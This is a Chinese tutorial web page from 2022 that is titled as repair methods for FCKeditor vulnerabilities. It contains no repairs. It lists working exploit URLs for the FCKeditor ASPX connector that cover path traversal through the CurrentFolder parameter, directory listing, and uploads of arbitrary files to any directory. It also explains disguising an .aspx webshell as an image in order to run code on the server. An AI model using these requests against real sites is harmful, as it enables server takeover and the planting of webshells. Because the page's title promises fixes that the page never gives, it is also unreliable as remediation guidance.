首页 > 脚本 > 网络编程 > web编辑器FCKeditor组件的漏洞修复方法,FCKeditor 新闻组件的一些程序漏洞

web编辑器FCKeditor组件的漏洞修复方法,FCKeditor 新闻组件的一些程序漏洞

来源:整理 时间:2022-02-18 11:05:28 编辑:飘云 手机版
web编辑器FCKeditor组件的漏洞修复方法,FCKeditor 新闻组件的一些程序漏洞上传文件时,通过修改CurrentFolder参数,可以将文件上传到不同的目录
1 CurrentFolder 参数,可以在网站中不同目录新建文件夹,参数使用 ../../来篡改参数,进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp


2 CurrentFolder 参数,根据返回的XML信息可以查看网站所有的目录,比如 “../../../”进入不同的目录,让后通过XML返回的消息就可以看到没有权限的页面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

3 上传文件时,通过修改CurrentFolder参数,可以将文件上传到不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F

4 同时修改Type 和CurrentFolder 参数,可以上传任意类型文件到网站任意目录,基本上网站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F

http://www.codepub.com/d/file/codepub/20220215/202202151610341439.jpg 或.rar等文件(实际文件是.aspx,把文件名该后缀),上传之后就可以利用漏洞执行代码了。 如:www.xxx.com/upload/file.aspx/123.jpg 输入之后,代码被成功执行。

web编辑器FCKeditor组件的漏洞修复方法,FCKeditor 新闻组件的一些程序漏洞相关文章内容教程修复方法。
文章TAG:FCKeditor新闻组件漏洞编辑器

最近更新

网络编程最新文章

脚本排行榜推荐